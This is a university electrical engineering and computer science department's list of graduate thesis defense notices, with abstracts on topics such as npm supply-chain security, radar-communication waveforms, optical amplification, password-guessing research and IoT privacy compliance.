Defense Notices
All students and faculty are welcome to attend the final defense of EECS graduate students completing their M.S. or Ph.D. degrees. Defense notices for M.S./Ph.D. presentations for this year and several previous years are listed below in reverse chronological order.
Students who are nearing the completion of their M.S./Ph.D. research should schedule their final defenses through the EECS graduate office at least THREE WEEKS PRIOR to their presentation date so that there is time to complete the degree requirements check, and post the presentation announcement online.
Upcoming Defense Notices
Elizabeth Wyss
A New Frontier for Software Security: Diving Deep into npmWhen & Where:
Eaton Hall, Room 2001B
Committee Members:
Drew Davidson, ChairAlex Bardas
Fengjun Li
Bo Luo
J. Walker
Abstract
Open-source package managers (e.g., npm for Node.js) have become an established component of modern software development. Rather than creating applications from scratch, developers may employ modular software dependencies and frameworks--called packages--to serve as building blocks for writing larger applications. Package managers make this process easy. With a simple command line directive, developers are able to quickly fetch and install packages across vast open-source repositories. npm--the largest of such repositories--alone hosts millions of unique packages and serves billions of package downloads each week.
However, the widespread code sharing resulting from open-source package managers also presents novel security implications. Vulnerable or malicious code hiding deep within package dependency trees can be leveraged downstream to attack both software developers and the end-users of their applications. This downstream flow of software dependencies--dubbed the software supply chain--is critical to secure.
This research provides a deep dive into the npm-centric software supply chain, exploring distinctive phenomena that impact its overall security and usability. Such factors include (i) hidden code clones--which may stealthily propagate known vulnerabilities, (ii) install-time attacks enabled by unmediated installation scripts, (iii) hard-coded URLs residing in package code, (iv) the impacts of open-source development practices, (v) package compromise via malicious updates, (vi) spammers disseminating phishing links within package metadata, and (vii) abuse of cryptocurrency protocols designed to reward the creators of high-impact packages. For each facet, tooling is presented to identify and/or mitigate potential security impacts. Ultimately, it is our hope that this research fosters greater awareness, deeper understanding, and further efforts to forge a new frontier for the security of modern software supply chains.
Alfred Fontes
Optimization and Trade-Space Analysis of Pulsed Radar-Communication Waveforms using Constant Envelope ModulationsWhen & Where:
Nichols Hall, Room 246 (Executive Conference Room)
Committee Members:
Patrick McCormick, ChairShannon Blunt
Jonathan Owen
Abstract
Dual function radar communications (DFRC) is a method of co-designing a single radio frequency system to perform simultaneous radar and communications service. DFRC is ultimately a compromise between radar sensing performance and communications data throughput due to the conflicting requirements between the sensing and information-bearing signals.
A novel waveform-based DFRC approach is phase attached radar communications (PARC), where a communications signal is embedded onto a radar pulse via the phase modulation between the two signals. The PARC framework is used here in a new waveform design technique that designs the radar component of a PARC signal to match the PARC DFRC waveform expected power spectral density (PSD) to a desired spectral template. This provides better control over the PARC signal spectrum, which mitigates the issue of PARC radar performance degradation from spectral growth due to the communications signal.
The characteristics of optimized PARC waveforms are then analyzed to establish a trade-space between radar and communications performance within a PARC DFRC scenario. This is done by sampling the DFRC trade-space continuum with waveforms that contain a varying degree of communications bandwidth, from a pure radar waveform (no embedded communications) to a pure communications waveform (no radar component). Radar performance, which is degraded by range sidelobe modulation (RSM) from the communications signal randomness, is measured from the PARC signal variance across pulses; data throughput is established as the communications performance metric. Comparing the values of these two measures as a function of communications symbol rate explores the trade-offs in performance between radar and communications with optimized PARC waveforms.
Arin Dutta
Performance Analysis of Distributed Raman Amplification with Different Pumping ConfigurationsWhen & Where:
Nichols Hall, Room 246 (Executive Conference Room)
Committee Members:
Rongqing Hui, ChairMorteza Hashemi
Rachel Jarvis
Alessandro Salandrino
Hui Zhao
Abstract
As internet services like high-definition videos, cloud computing, and artificial intelligence keep growing, optical networks need to keep up with the demand for more capacity. Optical amplifiers play a crucial role in offsetting fiber loss and enabling long-distance wavelength division multiplexing (WDM) transmission in high-capacity systems. Various methods have been proposed to enhance the capacity and reach of fiber communication systems, including advanced modulation formats, dense wavelength division multiplexing (DWDM) over ultra-wide bands, space-division multiplexing, and high-performance digital signal processing (DSP) technologies. To maintain higher data rates along with maximizing the spectral efficiency of multi-level modulated signals, a higher Optical Signal-to-Noise Ratio (OSNR) is necessary. Despite advancements in coherent optical communication systems, the spectral efficiency of multi-level modulated signals is ultimately constrained by fiber nonlinearity. Raman amplification is an attractive solution for wide-band amplification with low noise figures in multi-band systems.
Distributed Raman Amplification (DRA) have been deployed in recent high-capacity transmission experiments to achieve a relatively flat signal power distribution along the optical path and offers the unique advantage of using conventional low-loss silica fibers as the gain medium, effectively transforming passive optical fibers into active or amplifying waveguides. Also, DRA provides gain at any wavelength by selecting the appropriate pump wavelength, enabling operation in signal bands outside the Erbium doped fiber amplifier (EDFA) bands. Forward (FW) Raman pumping configuration in DRA can be adopted to further improve the DRA performance as it is more efficient in OSNR improvement because the optical noise is generated near the beginning of the fiber span and attenuated along the fiber. Dual-order FW pumping scheme helps to reduce the non-linear effect of the optical signal and improves OSNR by more uniformly distributing the Raman gain along the transmission span.
The major concern with Forward Distributed Raman Amplification (FW DRA) is the fluctuation in pump power, known as relative intensity noise (RIN), which transfers from the pump laser to both the intensity and phase of the transmitted optical signal as they propagate in the same direction. Additionally, another concern of FW DRA is the rise in signal optical power near the start of the fiber span, leading to an increase in the non-linear phase shift of the signal. These factors, including RIN transfer-induced noise and non-linear noise, contribute to the degradation of system performance in FW DRA systems at the receiver.
As the performance of DRA with backward pumping is well understood with relatively low impact of RIN transfer, our research is focused on the FW pumping configuration, and is intended to provide a comprehensive analysis on the system performance impact of dual order FW Raman pumping, including signal intensity and phase noise induced by the RINs of both 1st and the 2nd order pump lasers, as well as the impacts of linear and nonlinear noise. The efficiencies of pump RIN to signal intensity and phase noise transfer are theoretically analyzed and experimentally verified by applying a shallow intensity modulation to the pump laser to mimic the RIN. The results indicate that the efficiency of the 2nd order pump RIN to signal phase noise transfer can be more than 2 orders of magnitude higher than that from the 1st order pump. Then the performance of the dual order FW Raman configurations is compared with that of single order Raman pumping to understand trade-offs of system parameters. The nonlinear interference (NLI) noise is analyzed to study the overall OSNR improvement when employing a 2nd order Raman pump. Finally, a DWDM system with 16-QAM modulation is used as an example to investigate the benefit of DRA with dual order Raman pumping and with different pump RIN levels. We also consider a DRA system using a 1st order incoherent pump together with a 2nd order coherent pump. Although dual order FW pumping corresponds to a slight increase of linear amplified spontaneous emission (ASE) compared to using only a 1st order pump, its major advantage comes from the reduction of nonlinear interference noise in a DWDM system. Because the RIN of the 2nd order pump has much higher impact than that of the 1st order pump, there should be more stringent requirement on the RIN of the 2nd order pump laser when dual order FW pumping scheme is used for DRA for efficient fiber-optic communication. Also, the result of system performance analysis reveals that higher baud rate systems, like those operating at 100Gbaud, are less affected by pump laser RIN due to the low-pass characteristics of the transfer of pump RIN to signal phase noise.
Audrey Mockenhaupt
Using Dual Function Radar Communication Waveforms for Synthetic Aperture Radar Automatic Target RecognitionWhen & Where:
Nichols Hall, Room 246 (Executive Conference Room)
Committee Members:
Patrick McCormick, ChairShannon Blunt
Jon Owen
Abstract
Pending.
Rich Simeon
Delay-Doppler Channel Estimation for High-Speed Aeronautical Mobile Telemetry ApplicationsWhen & Where:
Eaton Hall, Room 2001B
Committee Members:
Erik Perrins, ChairShannon Blunt
Morteza Hashemi
Jim Stiles
Craig McLaughlin
Abstract
The next generation of digital communications systems aims to operate in high-Doppler environments such as high-speed trains and non-terrestrial networks that utilize satellites in low-Earth orbit. Current generation systems use Orthogonal Frequency Division Multiplexing modulation which is known to suffer from inter-carrier interference (ICI) when different channel paths have dissimilar Doppler shifts.
A new Orthogonal Time Frequency Space (OTFS) modulation (also known as Delay-Doppler modulation) is proposed as a candidate modulation for 6G networks that is resilient to ICI. To date, OTFS demodulation designs have focused on the use cases of popular urban terrestrial channel models where path delay spread is a fraction of the OTFS symbol duration. However, wireless wide-area networks that operate in the aeronautical mobile telemetry (AMT) space can have large path delay spreads due to reflections from distant geographic features. This presents problems for existing channel estimation techniques which assume a small maximum expected channel delay, since data transmission is paused to sound the channel by an amount equal to twice the maximum channel delay. The dropout in data contributes to a reduction in spectral efficiency.
Our research addresses OTFS limitations in the AMT use case. We start with an exemplary OTFS framework with parameters optimized for AMT. Following system design, we focus on two distinct areas to improve OTFS performance in the AMT environment. First we propose a new channel estimation technique using a pilot signal superimposed over data that can measure large delay spread channels with no penalty in spectral efficiency. A successive interference cancellation algorithm is used to iteratively improve channel estimates and jointly decode data. A second aspect of our research aims to equalize in delay-Doppler space. In the delay-Doppler paradigm, the rapid channel variations seen in the time-frequency domain is transformed into a sparse quasi-stationary channel in the delay-Doppler domain. We propose to use machine learning using Gaussian Process Regression to take advantage of the sparse and stationary channel and learn the channel parameters to compensate for the effects of fractional Doppler in which simpler channel estimation techniques cannot mitigate. Both areas of research can advance the robustness of OTFS across all communications systems.
Mohammad Ful Hossain Seikh
AAFIYA: Antenna Analysis in Frequency-domain for Impedance and Yield AssessmentWhen & Where:
Eaton Hall, Room 2001B
Committee Members:
Jim Stiles, ChairRachel Jarvis
Alessandro Salandrino
Abstract
This project presents AAFIYA (Antenna Analysis in Frequency-domain for Impedance and Yield Assessment), a modular Python toolkit developed to automate and streamline the characterization and analysis of radiofrequency (RF) antennas using both measurement and simulation data. Motivated by the need for reproducible, flexible, and publication-ready workflows in modern antenna research, AAFIYA provides comprehensive support for all major antenna metrics, including S-parameters, impedance, gain and beam patterns, polarization purity, and calibration-based yield estimation. The toolkit features robust data ingestion from standard formats (such as Touchstone files and beam pattern text files), vectorized computation of RF metrics, and high-quality plotting utilities suitable for scientific publication.
Validation was carried out using measurements from industry-standard electromagnetic anechoic chamber setups involving both Log Periodic Dipole Array (LPDA) reference antennas and Askaryan Radio Array (ARA) Bottom Vertically Polarized (BVPol) antennas, covering a frequency range of 50–1500 MHz. Key performance metrics, such as broadband impedance matching, S11 and S21 related calculations, 3D realized gain patterns, vector effective lengths, and cross-polarization ratio, were extracted and compared against full-wave electromagnetic simulations (using HFSS and WIPL-D). The results demonstrate close agreement between measurement and simulation, confirming the reliability of the workflow and calibration methodology.
AAFIYA’s open-source, extensible design enables rapid adaptation to new experiments and provides a foundation for future integration with machine learning and evolutionary optimization algorithms. This work not only delivers a validated toolkit for antenna research and pedagogy but also sets the stage for next-generation approaches in automated antenna design, optimization, and performance analysis.
Soumya Baddham
Battling Toxicity: A Comparative Analysis of Machine Learning Models for Content ModerationWhen & Where:
Eaton Hall, Room 2001B
Committee Members:
David Johnson, ChairPrasad Kulkarni
Hongyang Sun
Abstract
With the exponential growth of user-generated content, online platforms face unprecedented challenges in moderating toxic and harmful comments. Due to this, Automated content moderation has emerged as a critical application of machine learning, enabling platforms to ensure user safety and maintain community standards. Despite its importance, challenges such as severe class imbalance, contextual ambiguity, and the diverse nature of toxic language often compromise moderation accuracy, leading to biased classification performance.
This project presents a comparative analysis of machine learning approaches for a Multi-Label Toxic Comment Classification System using the Toxic Comment Classification dataset from Kaggle. The study examines the performance of traditional algorithms, such as Logistic Regression, Random Forest, and XGBoost, alongside deep architectures, including Bi-LSTM, CNN-Bi-LSTM, and DistilBERT. The proposed approach utilizes word-level embeddings across all models and examines the effects of architectural enhancements, hyperparameter optimization, and advanced training strategies on model robustness and predictive accuracy.
The study emphasizes the significance of loss function optimization and threshold adjustment strategies in improving the detection of minority classes. The comparative results reveal distinct performance trade-offs across model architectures, with transformer models achieving superior contextual understanding at the cost of computational complexity. At the same time, deep learning approaches(LSTM models) offer efficiency advantages. These findings establish evidence-based guidelines for model selection in real-world content moderation systems, striking a balance between accuracy requirements and operational constraints.
Past Defense Notices
Aiden Liang
Enhancing Healthcare Resource Demand Forecasting Using Machine Learning: An Integrated Approach to Addressing Temporal Dynamics and External InfluencesWhen & Where:
Nichols Hall, Room 246 (Executive Conference Room)
Committee Members:
Prasad Kulkarni, ChairFengjun Li
Zijun Yao
Abstract
This project aims to enhance predictive models for forecasting healthcare resource demand, particularly focusing on hospital bed occupancy and emergency room visits while considering external factors such as disease outbreaks and weather conditions. Utilizing a range of machine learning techniques, the research seeks to improve the accuracy and reliability of these forecasts, essential for optimizing healthcare resource management. The project involves multiple phases, starting with the collection and preparation of historical data from public health databases and hospital records, enriched with external variables such as weather patterns and epidemiological data. Advanced feature engineering is key, transforming raw data into a machine learning-friendly format, including temporal and lag features to identify patterns and trends. The study explores various machine learning methods, from traditional models like ARIMA to advanced techniques such as LSTM networks and GRU models, incorporating rigorous training and validation protocols to ensure robust performance. Model effectiveness is evaluated using metrics like MAE, RMSE, and MAPE, with a strong focus on model interpretability and explainability through techniques like SHAP and LIME. The project also addresses practical implementation challenges and ethical considerations, aiming to bridge academic research with practical healthcare applications. Findings are intended for dissemination through academic papers and conferences, ensuring that the models developed meet both the ethical standards and practical needs of the healthcare industry.
Thomas Atkins
Secure and Auditable Academic Collections Storage via Hyperledger Fabric-Based Smart ContractsWhen & Where:
Nichols Hall, Room 246 (Executive Conference Room)
Committee Members:
Drew Davidson, ChairFengjun Li
Bo Luo
Abstract
This paper introduces a novel approach to manage collections of artifacts through smart contract access control, rooted in on-chain role-based property-level access control. This smart contract facilitates the lifecycle of these artifacts including allowing for the creation, modification, removal, and historical auditing of the artifacts through both direct and suggested actions. This method introduces a collection object designed to store role privileges concerning state object properties. User roles are defined within an on-chain entity that maps users' signed identities to roles across different collections, enabling a single user to assume varying roles in distinct collections. Unlike existing key-level endorsement mechanisms, this approach offers finer-grained privileges by defining them on a per-property basis, not at the key level. The outcome is a more flexible and fine-grained access control system seamlessly integrated into the smart contract itself, empowering administrators to manage access with precision and adaptability across diverse organizational contexts. This has the added benefit of allowing for the auditing of not only the history of the artifacts, but also for the permissions granted to the users.
Theodore Harbison
Posting Passwords: How social media information can be leveraged in password guessing attacksWhen & Where:
Zoom Defense, please email jgrisafe@ku.edu for defense link.
Committee Members:
Hossein Saiedian, ChairFengjun Li
Heechul Yun
Abstract
The explosion of social media, while fostering connection, inadvertently exposes personal details that heighten password vulnerability. This thesis tackles this critical link, aiming to raise public awareness of the dangers of weak passwords and excessive online sharing. We introduce a novel password guessing algorithm, SocGuess, which capitalizes on the rich trove of information on social media profiles. SocGuess leverages Named Entity Recognition (NER) to identify key data points within this information, such as dates, locations, and names. To further enhance its accuracy, SocGuess is trained on the rockyou dataset, a large collection of leaked passwords. By identifying different kinds of entities within these passwords, SocGuess can calculate the probability of these entities appearing in passwords. Armed with this knowledge, SocGuess dynamically generates password guesses in order of probability by filling these entity placeholders with the corresponding data points harvested from the target’s social media profiles. This targeted approach shows SocGuess to crack 33% more passwords than existing algorithms during experimentation, demonstrably surpassing traditional methods.
Ethan Grantz
Swarm: A Backend-Agnostic Language for Simple Distributed ProgrammingWhen & Where:
Nichols Hall, Room 250 (Gemini Room)
Committee Members:
Drew Davidson, ChairPerry Alexander
Prasad Kulkarni
Abstract
Writing algorithms for a parallel or distributed environment has always been plagued with a variety of challenges, from supervising synchronous reads and writes, to managing job queues and avoiding deadlock. While many languages have libraries or language constructs to mitigate these obstacles, very few attempt to remove those challenges entirely, and even fewer do so while divorcing the means of handling those problems from the means of parallelization or distribution. This project introduces a language called Swarm, which attempts to do just that.
Swarm is a first-class parallel/distributed programming language with modular, swappable parallel drivers. It is intended for everything from multi-threaded local computation on a single machine to large scientific computations split across many nodes in a cluster.
Swarm contains next to no explicit syntax for typical parallel logic, only containing keywords for declaring which variables should reside in shared memory, and describing what code should be parallelized. The remainder of the logic (such as waiting for the results from distributed jobs or locking shared accesses) are added in when compiling to a custom bytecode called Swarm Virtual Instructions (SVI). SVI is then executed by a virtual machine whose parallelization logic is abstracted out, such that the same SVI bytecode can be executed in any parallel/distributed environment.
Johnson Umeike
Optimizing gem5 Simulator Performance: Profiling Insights and Userspace Networking EnhancementsWhen & Where:
Nichols Hall, Room 250 (Gemini Room)
Committee Members:
Mohammad Alian, ChairPrasad Kulkarni
Heechul Yun
Abstract
Full-system simulation of computer systems is critical for capturing the complex interplay between various hardware and software components in future systems. Modeling the network subsystem is indispensable for the fidelity of full-system simulations due to the increasing importance of scale-out systems. Over the last decade, the network software stack has undergone major changes, with userspace networking stacks and data-plane networks rapidly replacing the conventional kernel network stack. Nevertheless, the current state-of-the-art architectural simulator, gem5, still employs kernel networking, which precludes realistic network application scenarios.
First, we perform a comprehensive profiling study to identify and propose architectural optimizations to accelerate a state-of-the-art architectural simulator. We choose gem5 as the representative architectural simulator, run several simulations with various configurations, perform a detailed architectural analysis of the gem5 source code on different server platforms, tune both system and architectural settings for running simulations, and discuss the future opportunities in accelerating gem5 as an important application. Our detailed profiling of gem5 reveals that its performance is extremely sensitive to the size of the L1 cache. Our experimental results show that a RISC-V core with 32KB data and instruction cache improves gem5’s simulation speed by 31%∼61% compared with a baseline core with 8KB L1 caches. Second, this work extends gem5’s networking capabilities by integrating kernel-bypass/user-space networking based on the DPDK framework, significantly enhancing network throughput and reducing latency. By enabling user-space networking, the simulator achieves a substantial 6.3× improvement in network bandwidth compared to traditional Linux software stacks. Our hardware packet generator model (EtherLoadGen) provides up to a 2.1× speedup in simulation time. Additionally, we develop a suite of networking micro-benchmarks for stress testing the host network stack, allowing for efficient evaluation of gem5’s performance. Through detailed experimental analysis, we characterize the performance differences when running the DPDK network stack on both real systems and gem5, highlighting the sensitivity of DPDK performance to various system and microarchitecture parameters.
Adam Sarhage
Design of Multi-Section Coupled Line CouplerWhen & Where:
Eaton Hall, Room 2001B
Committee Members:
Jim Stiles, ChairChris Allen
Glenn Prescott
Abstract
Coupled line couplers are used as directional couplers to enable measurement of forward and reverse power in RF transmitters. These measurements provide valuable feedback to the control loops regulating transmitter power output levels. This project seeks to synthesize, simulate, build, and test a broadband, five-stage coupled line coupler with a 20 dB coupling factor. The coupler synthesis is evaluated against ideal coupler components in Keysight ADS. Fabrication of coupled line couplers is typically accomplished with a stripline topology, but a microstrip topology is additionally evaluated. Measurements from the fabricated coupled line couplers are then compared to the Keysight ADS EM simulations, and some explanations for the differences are provided. Additionally, measurements from a commercially available broadband directional coupler are provided to show what can be accomplished with the right budget.
Mohsen Nayebi Kerdabadi
Contrastive Learning of Temporal Distinctiveness for Survival Analysis in Electronic Health RecordsWhen & Where:
Nichols Hall, Room 250 (Gemini Room)
Committee Members:
Zijun Yao, ChairFengjun Li
Cuncong Zhong
Abstract
Survival analysis plays a crucial role in many healthcare decisions, where the risk prediction for the events of interest can support an informative outlook for a patient's medical journey. Given the existence of data censoring, an effective way of survival analysis is to enforce the pairwise temporal concordance between censored and observed data, aiming to utilize the time interval before censoring as partially observed time-to-event labels for supervised learning. Although existing studies mostly employed ranking methods to pursue an ordering objective, contrastive methods which learn a discriminative embedding by having data contrast against each other, have not been explored thoroughly for survival analysis. Therefore, we propose a novel Ontology-aware Temporality-based Contrastive Survival (OTCSurv) analysis framework that utilizes survival durations from both censored and observed data to define temporal distinctiveness and construct negative sample pairs with adjustable hardness for contrastive learning. Specifically, we first use an ontological encoder and a sequential self-attention encoder to represent the longitudinal EHR data with rich contexts. Second, we design a temporal contrastive loss to capture varying survival durations in a supervised setting through a hardness-aware negative sampling mechanism. Last, we incorporate the contrastive task into the time-to-event predictive task with multiple loss components. We conduct extensive experiments using a large EHR dataset to forecast the risk of hospitalized patients who are in danger of developing acute kidney injury (AKI), a critical and urgent medical condition. The effectiveness and explainability of the proposed model are validated through comprehensive quantitative and qualitative studies.
Jarrett Zeliff
An Analysis of Bluetooth Mesh Security Features in the Context of Secure CommunicationsWhen & Where:
Eaton Hall, Room 1
Committee Members:
Alexandru Bardas, ChairDrew Davidson
Fengjun Li
Abstract
Significant developments in communication methods to help support at-risk populations have increased over the last 10 years. We view at-risk populations as a group of people present in environments where the use of infrastructure or electricity, including telecommunications, is censored and/or dangerous. Security features that accompany these communication mechanisms are essential to protect the confidentiality of its user base and the integrity and availability of the communication network.
In this work, we look at the feasibility of using Bluetooth Mesh as a communication network and analyze the security features that are inherent to the protocol. Through this analysis we determine the strengths and weaknesses of Bluetooth Mesh security features when used as a messaging medium for at risk populations and provide improvements to current shortcomings. Our analysis includes looking at the Bluetooth Mesh Networking Security Fundamentals as described by the Bluetooth Sig: Encryption and Authentication, Separation of Concerns, Area isolation, Key Refresh, Message Obfuscation, Replay Attack Protection, Trashcan Attack Protection, and Secure Device Provisioning. We look at how each security feature is implemented and determine if these implementations are sufficient in protecting the users from various attack vectors. For example, we examined the Blue Mirror attack, a reflection attack during the provisioning process which leads to the compromise of network keys, while also assessing the under-researched key refresh mechanism. We propose a mechanism to address Blue-Mirror-oriented attacks with the goal of creating a more secure provisioning process. To analyze the key refresh mechanism, we implemented our own full-fledged Bluetooth Mesh network and implemented a key refresh mechanism. Through this we form an assessment of the throughput, range, and impacts of a key refresh in both lab and field environments that demonstrate the suitability of our solution as a secure communication method.
Daniel Johnson
Probability-Aware Selective Protection for Sparse Iterative SolversWhen & Where:
Nichols Hall, Room 246 (Executive Conference Room)
Committee Members:
Hongyang Sun, ChairPerry Alexander
Zijun Yao
Abstract
With the increasing scale of high-performance computing (HPC) systems, transient bit-flip errors are now more likely than ever, posing a threat to long-running scientific applications. A substantial portion of these applications involve the simulation of partial differential equations (PDEs) modeling physical processes over discretized spatial and temporal domains, with some requiring the solving of sparse linear systems. While these applications are often paired with system-level application-agnostic resilience techniques such as checkpointing and replication, the utilization of these techniques imposes significant overhead. In this work, we present a probability-aware framework that produces low-overhead selective protection schemes for the widely used Preconditioned Conjugate Gradient (PCG) method, whose performance can heavily degrade due to error propagation through the sparse matrix-vector multiplication (SpMV) operation. Through the use of a straightforward mathematical model and an optimized machine learning model, our selective protection schemes incorporate error probability to protect only certain crucial operations. An experimental evaluation using 15 matrices from the SuiteSparse Matrix Collection demonstrates that our protection schemes effectively reduce resilience overheads, often outperforming or matching both baseline and established protection schemes across all error probabilities.
Javaria Ahmad
Discovering Privacy Compliance Issues in IoT Apps and Alexa Skills Using AI and Presenting a Mechanism for Enforcing Privacy ComplianceWhen & Where:
LEEP2, Room 2425
Committee Members:
Bo Luo, ChairAlex Bardas
Tamzidul Hoque
Fengjun Li
Michael Zhuo Wang
Abstract
The growth of IoT and voice assistant (VA) apps poses increasing concerns about sensitive data leaks. While privacy policies are required to describe how these apps use private user data (i.e., data practice), problems such as missing, inaccurate, and inconsistent policies have been repeatedly reported. Therefore, it is important to assess the actual data practice in apps and identify the potential gaps between the actual and declared data usage. We find that app stores lack in regulating the compliance between the app practices and their declaration, so we use AI to discover the compliance issues in these apps to assist the regulators and developers. For VA apps, we also develop a mechanism to enforce the compliance using AI. In this work, we conduct a measurement study using our framework called IoTPrivComp, which applies an automated analysis of IoT apps’ code and privacy policies to identify compliance gaps. We collect 1,489 IoT apps with English privacy policies from the Play Store. IoTPrivComp detects 532 apps with sensitive external data flows, among which 408 (76.7%) apps have undisclosed data leaks. Moreover, 63.4% of the data flows that involve health and wellness data are inconsistent with the practices disclosed in the apps’ privacy policies. Next, we focus on the compliance issues in skills. VAs, such as Amazon Alexa, are integrated with numerous devices in homes and cars to process user requests using apps called skills. With their growing popularity, VAs also pose serious privacy concerns. Sensitive user data captured by VAs may be transmitted to third-party skills without users’ consent or knowledge about how their data is processed. Privacy policies are a standard medium to inform the users of the data practices performed by the skills. However, privacy policy compliance verification of such skills is challenging, since the source code is controlled by the skill developers, who can make arbitrary changes to the behaviors of the skill without being audited; hence, conventional defense mechanisms using static/dynamic code analysis can be easily escaped. We present Eunomia, the first real-time privacy compliance firewall for Alexa Skills. As the skills interact with the users, Eunomia monitors their actions by hijacking and examining the communications from the skills to the users, and validates them against the published privacy policies that are parsed using a BERT-based policy analysis module. When non-compliant skill behaviors are detected, Eunomia stops the interaction and warns the user. We evaluate Eunomia with 55,898 skills on Amazon skills store to demonstrate its effectiveness and to provide a privacy compliance landscape of Alexa skills.